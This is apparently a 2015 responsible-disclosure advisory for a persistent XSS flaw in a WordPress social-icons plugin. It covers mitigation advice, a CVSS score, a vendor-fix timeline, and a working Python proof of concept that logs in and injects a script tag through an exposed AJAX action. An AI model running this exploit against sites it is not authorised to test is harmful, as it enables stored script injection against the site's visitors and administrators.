Ultimate Social Media and Share Icons 1.1.1.11, Persistent XSS
The Ultimate Social Media Icons plugin exposes several AJAX methods to all registered users, regardless of user level (see content of ultimate-social-media-icons/libs/controllers/sfsi_buttons_controller.php). These methods are used to update settings in the plugin, with regards to display of buttons / text on the site. By providing a few specific parameters, it is possible to achieve a Persistent XSS attack, which will be displayed on every page of the site (including the settings screen for the plugin in the administration panel).
Homepage
https://wordpress.org/plugins/ultimate-social-media-icons/
CVSS Score
4
CSSS Vector
(AV:N/AC:L/Au:S/C:N/I:P/A:N)
Attack Scope
remote
Authorization Required
Registered
Mitigation
Implement nonces and access control (via roles) to all sensitive AJAX methods. Sanitize user input to these methods.
Proof of Concept
The following PoC will result in an alert being presented on all pages of the site, including the settings screen for the plugin in the administration panel.
import requests
s = requests.session()
target = 'http://localhost'
url = '%s/wp-login.php'%target
payload = {
"log":"test",
"pwd":"test",
"wp-submit":"Log+In"
}
r = s.post(url, data=payload)
url = '%s/wp-admin/admin-ajax.php'%target
payload = {
"action":"updateSrcn7",
"sfsi_popup_text":"<script>alert(1)</script>",
"sfsi_Show_popupOn":"everypage",
"sfsi_Shown_popupOnceTime":""
}
r = s.post(url, data=payload)
Timeline
- 2015-05-15: Discovered
- 2015-05-15: Vendor notified
- 2015-05-15: Vendor responded
- 2015-05-23: Version 1.1.1.12 released – issue resolved
- 2015-05-30: Advisory released